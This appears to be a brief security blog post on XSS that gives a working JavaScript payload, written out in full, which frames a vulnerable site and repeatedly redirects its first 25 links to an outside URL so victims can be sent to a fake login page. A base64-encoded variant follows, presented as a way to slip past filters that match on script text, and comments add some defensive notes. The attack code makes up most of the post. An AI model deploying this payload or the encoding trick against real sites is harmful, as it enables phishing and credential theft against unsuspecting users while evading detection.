Fun with XSS



If you find an XSS but there are no cookies to steal, you could instead show a PoC that manipulates the content of the website's main page, which could be used in a phishing scenario. The following would alter the first 25 links on the webpage and point them to https://kennyjansson.com, which could, for example, display a fake login page. Because the victim clicks through the site as usual, this seems more trustworthy than a link that goes directly to the website.

// PoC payload from the post: one string handed to write() (presumably document.write — verify).
// The inner script defines a(), which sets the href of the first 25 <a> elements found inside
// the first <iframe> to a single fixed URL, logs "I am under control of this page", and
// re-schedules itself with setTimeout every 3000 ms, so links the page restores get
// overwritten again. If the global `pframe` is undefined it creates a borderless,
// full-size, absolutely positioned iframe named "netframe" loading the vulnerable site,
// appends it to <body>, sets `second`, and records the frame's location in `pframe`.
// Defender notes: reading contentWindow.document across origins is blocked by the
// same-origin policy, so this only works because the injected script already runs on the
// framed site's origin — the root cause is the XSS, not framing. A CSP that disallows
// inline script prevents this payload from executing; the recurring console message and
// a page framing its own origin are worth looking for when reviewing a suspected incident.
write('<html><body><script>function a() { for (var i=0, max=25; i < max; i++) {parent.document.getElementsByTagName("iframe")[0].contentWindow.document.getElementsByTagName("a")[i].href ="https://kennyjansson.com/"};console.log("I am under control of this page"); setTimeout(function () { a() }, 3000);} if (typeof pframe === "undefined") { var iframe = document.createElement("iframe");iframe.onload = a;iframe.width = "100%";iframe.height = "100%"; iframe.src = "https://vulnerablewebsitewithxss.com"; iframe.frameBorder=0;iframe.setAttribute("style", "position:absolute;top:1px;left:2px");iframe.name = "netframe";body = document.getElementsByTagName("body")[0];body.appendChild(iframe); second = "yes";pframe = parent.document.getElementsByTagName("iframe")[0].contentWindow.document.location.href}')

You can also base64-encode the payload:

// Same payload, base64-encoded and decoded with atob() at runtime; the encoded string was
// redacted in this copy. Encoding only obscures the source text — what executes is
// unchanged, so filters or detections that match on the literal script text will miss it,
// while a CSP blocking inline script still stops it.
write(atob('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'))
